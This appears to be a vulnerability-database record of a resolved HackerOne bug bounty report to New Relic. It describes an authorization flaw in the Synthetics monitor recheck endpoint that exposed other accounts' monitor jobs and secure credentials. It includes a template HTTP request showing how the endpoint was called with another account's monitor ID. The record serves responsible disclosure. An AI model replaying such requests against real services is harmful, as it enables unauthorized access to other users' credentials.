ID H1:787886Type hackeroneReporter skavansModified 2020-08-13T13:45:22
Description
@skavans identified an endpoint for testing Synthetics monitors. Without proper validation, this could allow monitors from other accounts to run on your account with knowledge of the monitor's ID:
```
POST /accounts/<ACCOUNT ID>/monitors/monitor/recheck.json?monitorId=<MONITOR_ID> HTTP/1.1
Host: synthetics.newrelic.com
...
{"monitorId":"<MONITOR_ID>","location":"AWS_AP_SOUTHEAST_1","accountId":<ACCOUNT ID>}
```
{"id": "H1:787886", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "New Relic: Ability to run monitors' jobs of other accounts and to read these jobs content (including the secure credentials values)", "description": "@skavans identified an endpoint for testing Synthetics monitors. Without proper validation, this could allow monitors from other accounts to run on your account with knowledge of the monitor's ID:\n\n```\nPOST /accounts/<ACCOUNT ID>/monitors/monitor/recheck.json?monitorId=<MONITOR_ID> HTTP/1.1\nHost: synthetics.newrelic.com\n...\n\n{\"monitorId\":\"<MONITOR_ID>\",\"location\":\"AWS_AP_SOUTHEAST_1\",\"accountId\":<ACCOUNT ID>}\n```", "published": "2020-02-02T21:50:29", "modified": "2020-08-13T13:45:22", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/787886", "reporter": "skavans", "references": [], "cvelist": [], "lastseen": "2020-08-13T14:53:43", "viewCount": 0, "enchantments": {"dependencies": {"references": [], "modified": "2020-08-13T14:53:43", "rev": 2}, "score": {"value": 3.9, "vector": "NONE", "modified": "2020-08-13T14:53:43", "rev": 2}, "vulnersScore": 3.9}, "bounty": 2500.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/newrelic", "handle": "newrelic", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/017/011/eba06abb23bd6c9c7d719ddafb9fa83bd2d66aaa_original./3afcb5c896247e7ee8ada31b1c1eb8657e22241f911093acfe4ec7e97a3a959a", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/017/011/eba06abb23bd6c9c7d719ddafb9fa83bd2d66aaa_original./eb31823a4cc9f6b6bb4db930ffdf512533928a68a4255fb50a83180281a60da5"}}, "h1reporter": {"disabled": false, "username": "skavans", "url": "/skavans", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/014/089/00a08f6b566bcdfe82b2f0be62bdde605a030823_original.jpg/3afcb5c896247e7ee8ada31b1c1eb8657e22241f911093acfe4ec7e97a3a959a"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}
{}
